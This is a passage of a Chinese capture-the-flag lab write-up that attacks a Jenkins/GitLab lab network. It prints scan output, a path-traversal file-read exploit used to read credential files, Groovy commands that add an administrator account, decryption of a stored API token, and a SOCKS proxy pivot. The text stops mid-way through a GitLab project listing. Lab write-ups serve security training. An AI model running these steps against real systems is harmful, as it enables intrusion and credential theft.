Privilege
2024年4月19日...大约 14 分钟
获取靶机信息
题目给出 IP: 39.103.138.101
题目描述
第一关:请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
第二关:管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
第三关:攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
第四关:尝试接管备份管理操作员帐户,并通过转储 NTDS 获得域管理员权限,最终控制整个域环境。
扫描端口、路径
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.103.138.101:139 open
39.103.138.101:8080 open
39.103.138.101:135 open
39.103.138.101:80 open
39.103.138.101:3306 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]39.103.138.101
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle http://39.103.138.101:8080 code:403 len:548 title:None
[*] WebTitle http://39.103.138.101 code:200 len:54732 title:XR SHOP
[+] PocScan http://39.103.138.101/www.zip poc-yaml-backup-file
已完成 5/5
[*] 扫描结束,耗时: 1m10.638390649s┌──(root㉿kali)-[~]
└─# dirsearch -u "http://39.103.138.101/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_39.103.138.101/__24-04-19_10-51-48.txt
Target: http://39.103.138.101/
[10:51:48] Starting:
[10:51:59] 301 - 0B - /%2e%2e//google.com -> http://39.103.138.101/%2E%2E/google.com
[10:54:13] 301 - 0B - /0 -> http://39.103.138.101/
[10:55:06] 301 - 0B - /adm/index.php -> http://39.103.138.101/adm/
[10:55:07] 302 - 0B - /admin -> http://39.103.138.101/wp-admin/
[10:55:12] 301 - 0B - /admin. -> http://39.103.138.101/admin
[10:55:14] 302 - 0B - /admin/ -> http://39.103.138.101/wp-admin/
[10:55:23] 301 - 0B - /admin/index.php -> http://39.103.138.101/admin/
[10:55:25] 301 - 0B - /admin/mysql/index.php -> http://39.103.138.101/admin/mysql/
[10:55:26] 301 - 0B - /admin/mysql2/index.php -> http://39.103.138.101/admin/mysql2/
[10:55:26] 301 - 0B - /admin/phpMyAdmin/index.php -> http://39.103.138.101/admin/phpMyAdmin/
[10:55:26] 301 - 0B - /admin/phpmyadmin/index.php -> http://39.103.138.101/admin/phpmyadmin/
[10:55:26] 301 - 0B - /admin/phpmyadmin2/index.php -> http://39.103.138.101/admin/phpmyadmin2/
[10:55:26] 301 - 0B - /admin/PMA/index.php -> http://39.103.138.101/admin/PMA/
[10:55:26] 301 - 0B - /admin/pma/index.php -> http://39.103.138.101/admin/pma/
[10:55:29] 301 - 0B - /admin2/index.php -> http://39.103.138.101/admin2/
[10:55:37] 301 - 0B - /admin_area/index.php -> http://39.103.138.101/admin_area/
[10:56:13] 301 - 0B - /adminarea/index.php -> http://39.103.138.101/adminarea/
[10:56:20] 301 - 0B - /admincp/index.php -> http://39.103.138.101/admincp/
[10:56:27] 301 - 0B - /adminer/index.php -> http://39.103.138.101/adminer/
[10:56:43] 301 - 0B - /administrator/index.php -> http://39.103.138.101/administrator/
[10:57:17] 301 - 0B - /apc/index.php -> http://39.103.138.101/apc/
[10:57:38] 301 - 0B - /asset.. -> http://39.103.138.101/asset
[10:57:39] 301 - 0B - /atom -> http://39.103.138.101/feed/atom/
[10:57:50] 301 - 0B - /axis2-web//HappyAxis.jsp -> http://39.103.138.101/axis2-web/HappyAxis.jsp
[10:57:50] 301 - 0B - /axis//happyaxis.jsp -> http://39.103.138.101/axis/happyaxis.jsp
[10:57:50] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> http://39.103.138.101/axis2/axis2-web/HappyAxis.jsp
[10:57:58] 301 - 0B - /banner2 -> http://39.103.138.101/banner2/
[10:58:01] 301 - 0B - /bb-admin/index.php -> http://39.103.138.101/bb-admin/
[10:58:09] 301 - 0B - /bitrix/admin/index.php -> http://39.103.138.101/bitrix/admin/
[10:58:39] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://39.103.138.101/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[10:58:40] 301 - 0B - /claroline/phpMyAdmin/index.php -> http://39.103.138.101/claroline/phpMyAdmin/
[10:59:28] 302 - 0B - /dashboard -> http://39.103.138.101/wp-admin/
[10:59:29] 302 - 0B - /dashboard/ -> http://39.103.138.101/wp-admin/
[10:59:36] 301 - 0B - /db/index.php -> http://39.103.138.101/db/
[10:59:39] 301 - 0B - /dbadmin/index.php -> http://39.103.138.101/dbadmin/
[11:00:13] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> http://39.103.138.101/engine/classes/swfupload/swfupload.swf
[11:00:13] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> http://39.103.138.101/engine/classes/swfupload/swfupload_f9.swf
[11:00:21] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://39.103.138.101/etc/lib/pChart2/examples/imageMap/
[11:00:30] 301 - 0B - /extjs/resources//charts.swf -> http://39.103.138.101/extjs/resources/charts.swf
[11:00:33] 302 - 0B - /favicon.ico -> http://39.103.138.101/wp-includes/images/w-logo-blue-white-bg.png
[11:00:36] 301 - 0B - /feed -> http://39.103.138.101/feed/
[11:01:08] 301 - 0B - /h -> http://39.103.138.101/2022/12/25/hello-world/
[11:01:13] 301 - 0B - /hello -> http://39.103.138.101/2022/12/25/hello-world/
[11:01:20] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://39.103.138.101/html/js/misc/swfupload/swfupload.swf
[11:01:36] 301 - 0B - /index.php -> http://39.103.138.101/
[11:01:39] 301 - 0B - /index.php/login/ -> http://39.103.138.101/login/
[11:01:47] 301 - 0B - /install/index.php?upgrade/ -> http://39.103.138.101/install/?upgrade/
[11:01:57] 301 - 0B - /jkstatus; -> http://39.103.138.101/jkstatus
[11:02:15] 200 - 19KB - /LICENSE.txt
[11:02:15] 200 - 19KB - /license.txt
[11:02:28] 302 - 0B - /login -> http://39.103.138.101/wp-login.php
[11:02:30] 301 - 0B - /login.wdm%20 -> http://39.103.138.101/login.wdm
[11:02:30] 301 - 0B - /login.wdm%2e -> http://39.103.138.101/login.wdm
[11:02:30] 302 - 0B - /login/ -> http://39.103.138.101/wp-login.php
[11:03:12] 301 - 0B - /modelsearch/index.php -> http://39.103.138.101/modelsearch/
[11:03:25] 301 - 0B - /myadmin/index.php -> http://39.103.138.101/myadmin/
[11:03:25] 301 - 0B - /myadmin2/index.php -> http://39.103.138.101/myadmin2/
[11:03:26] 301 - 0B - /mysql-admin/index.php -> http://39.103.138.101/mysql-admin/
[11:03:27] 301 - 0B - /mysql/index.php -> http://39.103.138.101/mysql/
[11:03:28] 301 - 0B - /mysqladmin/index.php -> http://39.103.138.101/mysqladmin/
[11:03:31] 301 - 0B - /New%20folder%20(2) -> http://39.103.138.101/New%20folder%20(2
[11:03:55] 301 - 0B - /panel-administracion/index.php -> http://39.103.138.101/panel-administracion/
[11:04:10] 301 - 0B - /phpadmin/index.php -> http://39.103.138.101/phpadmin/
[11:04:14] 301 - 0B - /phpma/index.php -> http://39.103.138.101/phpma/
[11:04:18] 301 - 0B - /phpmyadmin!! -> http://39.103.138.101/phpmyadmin
[11:04:33] 301 - 0B - /phpmyadmin-old/index.php -> http://39.103.138.101/phpmyadmin-old/
[11:04:33] 301 - 0B - /phpMyAdmin.old/index.php -> http://39.103.138.101/phpMyAdmin.old/
[11:04:34] 301 - 0B - /phpMyAdmin/index.php -> http://39.103.138.101/phpMyAdmin/
[11:04:34] 301 - 0B - /phpmyadmin/index.php -> http://39.103.138.101/phpmyadmin/
[11:04:34] 301 - 0B - /phpMyAdmin/phpMyAdmin/index.php -> http://39.103.138.101/phpMyAdmin/phpMyAdmin/
[11:04:34] 301 - 0B - /phpmyadmin/phpmyadmin/index.php -> http://39.103.138.101/phpmyadmin/phpmyadmin/
[11:04:34] 301 - 0B - /phpmyadmin1/index.php -> http://39.103.138.101/phpmyadmin1/
[11:04:35] 301 - 0B - /phpmyadmin0/index.php -> http://39.103.138.101/phpmyadmin0/
[11:04:35] 301 - 0B - /phpmyadmin2/index.php -> http://39.103.138.101/phpmyadmin2/
[11:04:36] 301 - 0B - /phpMyAdminold/index.php -> http://39.103.138.101/phpMyAdminold/
[11:04:37] 301 - 0B - /phpMyadmin_bak/index.php -> http://39.103.138.101/phpMyadmin_bak/
[11:04:44] 301 - 0B - /pma-old/index.php -> http://39.103.138.101/pma-old/
[11:04:44] 301 - 0B - /PMA/index.php -> http://39.103.138.101/PMA/
[11:04:44] 301 - 0B - /pma/index.php -> http://39.103.138.101/pma/
[11:04:45] 301 - 0B - /PMA2/index.php -> http://39.103.138.101/PMA2/
[11:04:46] 301 - 0B - /pmamy2/index.php -> http://39.103.138.101/pmamy2/
[11:04:46] 301 - 0B - /pmamy/index.php -> http://39.103.138.101/pmamy/
[11:04:46] 301 - 0B - /pmd/index.php -> http://39.103.138.101/pmd/
[11:05:10] 200 - 7KB - /README.html
[11:05:10] 301 - 0B - /rating_over. -> http://39.103.138.101/rating_over
[11:05:10] 200 - 7KB - /ReadMe.html
[11:05:10] 200 - 7KB - /Readme.html
[11:05:10] 200 - 7KB - /readme.html
[11:05:28] 301 - 0B - /roundcube/index.php -> http://39.103.138.101/roundcube/
[11:05:29] 200 - 114B - /robots.txt
[11:05:29] 301 - 0B - /rss -> http://39.103.138.101/feed/
[11:05:32] 301 - 0B - /s -> http://39.103.138.101/sample-page/
[11:05:32] 301 - 0B - /sample -> http://39.103.138.101/sample-page/
[11:05:49] 301 - 0B - /servlet/hello -> http://39.103.138.101/2022/12/25/hello-world/
[11:06:08] 301 - 0B - /siteadmin/index.php -> http://39.103.138.101/siteadmin/
[11:06:10] 302 - 0B - /sitemap.xml -> http://39.103.138.101/wp-sitemap.xml
[11:06:21] 301 - 0B - /sql/index.php -> http://39.103.138.101/sql/
[11:06:30] 301 - 0B - /static.. -> http://39.103.138.101/static
[11:06:39] 301 - 0B - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates -> http://39.103.138.101/sugarcrm/?module=Accounts&action=ShowDuplicates
[11:06:39] 301 - 0B - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates -> http://39.103.138.101/sugarcrm/?module=Contacts&action=ShowDuplicates
[11:07:03] 301 - 0B - /templates/beez/index.php -> http://39.103.138.101/templates/beez/
[11:07:03] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://39.103.138.101/templates/ja-helio-farsi/
[11:07:03] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://39.103.138.101/templates/rhuk_milkyway/
[11:07:18] 301 - 0B - /tmp/index.php -> http://39.103.138.101/tmp/
[11:07:18] 301 - 236B - /tools -> http://39.103.138.101/tools/
[11:07:18] 200 - 1KB - /tools/
[11:07:22] 301 - 0B - /tools/phpMyAdmin/index.php -> http://39.103.138.101/tools/phpMyAdmin/
[11:07:26] 301 - 0B - /typo3/phpmyadmin/index.php -> http://39.103.138.101/typo3/phpmyadmin/
[11:07:34] 301 - 0B - /us -> http://39.103.138.101/usces-cart/
[11:08:24] 301 - 0B - /web/phpMyAdmin/index.php -> http://39.103.138.101/web/phpMyAdmin/
[11:08:25] 301 - 0B - /webadmin/index.php -> http://39.103.138.101/webadmin/
[11:08:35] 301 - 239B - /wp-admin -> http://39.103.138.101/wp-admin/
[11:08:35] 200 - 1KB - /wp-admin/install.php
[11:08:35] 409 - 3KB - /wp-admin/setup-config.php
[11:08:35] 302 - 0B - /wp-admin/ -> http://39.103.138.101/wp-login.php?redirect_to=http%3A%2F%2F39.103.138.101%2Fwp-admin%2F&reauth=1
[11:08:35] 400 - 1B - /wp-admin/admin-ajax.php
[11:08:36] 200 - 0B - /wp-config.php
[11:08:37] 301 - 241B - /wp-content -> http://39.103.138.101/wp-content/
[11:08:37] 200 - 0B - /wp-content/
[11:08:39] 200 - 254B - /wp-content/plugins/hello.php
[11:08:39] 200 - 710B - /wp-content/upgrade/
[11:08:39] 200 - 1KB - /wp-content/uploads/
[11:08:40] 301 - 0B - /wp-content/plugins/adminer/inc/editor/index.php -> http://39.103.138.101/wp-content/plugins/adminer/inc/editor/
[11:08:41] 301 - 242B - /wp-includes -> http://39.103.138.101/wp-includes/
[11:08:41] 200 - 55KB - /wp-includes/
[11:08:41] 200 - 6KB - /wp-login.php
[11:08:42] 200 - 0B - /wp-includes/rss-functions.php
[11:08:43] 200 - 0B - /wp-cron.php
[11:08:43] 200 - 161KB - /wp-json/
[11:08:43] 200 - 581B - /wp-json/wp/v2/users/
[11:08:44] 301 - 0B - /wp-register.php -> http://39.103.138.101/wp-login.php?action=register
[11:08:44] 302 - 0B - /wp-signup.php -> http://39.103.138.101/wp-login.php?action=register
[11:08:46] 200 - 36MB - /www.zip
[11:08:48] 301 - 0B - /www/phpMyAdmin/index.php -> http://39.103.138.101/www/phpMyAdmin/
[11:08:49] 405 - 42B - /xmlrpc.php
[11:08:50] 301 - 0B - /xampp/phpmyadmin/index.php -> http://39.103.138.101/xampp/phpmyadmin/
Task Completed寻找漏洞
发现根目录打包文件 www.zip,下载解压后发现是一个网站的源码。
在 tools/content-log.php 下发现文件任意读取漏洞。
// tools/content-log.php
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
// Get the content and echo it.
$text = file_get_contents( $logfile );
echo( $text );
}
exit;于是利用漏洞
http://39.103.138.101/tools/content-log.php?logfile=../../../../../../../../../../../Users/Administrator/flag/flag01.txt
根据提示找到 Jenkins 配置目录 C:\ProgramData\Jenkins\.jenkins,在 secrets/initialAdminPassword 下找到 Jenkins 初始密码。
http://39.103.138.101/tools/content-log.php?logfile=../../../../../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword
使用账号密码 admin:510235cf43f14e83b88a9f144199655b 登录 Jenkins。
成功进入
找到执行脚本的功能,使用 groovy 脚本执行命令。
println 'net user chy 123!@#qwe /add'.execute().text
println 'net localgroup administrators chy /add'.execute().text使用 RDP 连接到靶机,登陆后获取到数据库密码,没发现什么有用的信息。
然后上传 fscan 到靶机,扫描内网,发现了一个内网 IP
PS C:\Users\chy\Desktop> .\fscan.exe -h 172.22.14.7/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 22/22
[*] 扫描结束,耗时: 1m22.0774836s- 172.22.14.7 已经拿下
- 172.22.14.16 Gitlab
- 172.22.14.31 WORKGROUP\XR-ORACLE
- 172.22.14.46 XIAORANG\XR-0923
- 172.22.14.11 DC XIAORANG\XR-DC
在 Jenkins 的配置文件中找到 Gitlab 的 API Token
文件路径:C:\ProgramData\Jenkins\.jenkins\credentials.xml
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>可以看到 apiToken 被加密,使用 hudson.util.Secret 类来解密一个加密过的字符串
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
得到 Gitlab 的 API Token:glpat-7kD_qLH2PiQv_ywB9hz2
在靶机上挂 gost 端口转发
.\gost-windows-amd64.exe -L=socks5://:1025
kali 配置 proxychains 访问
用 vscode 格式化一下可以看到
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
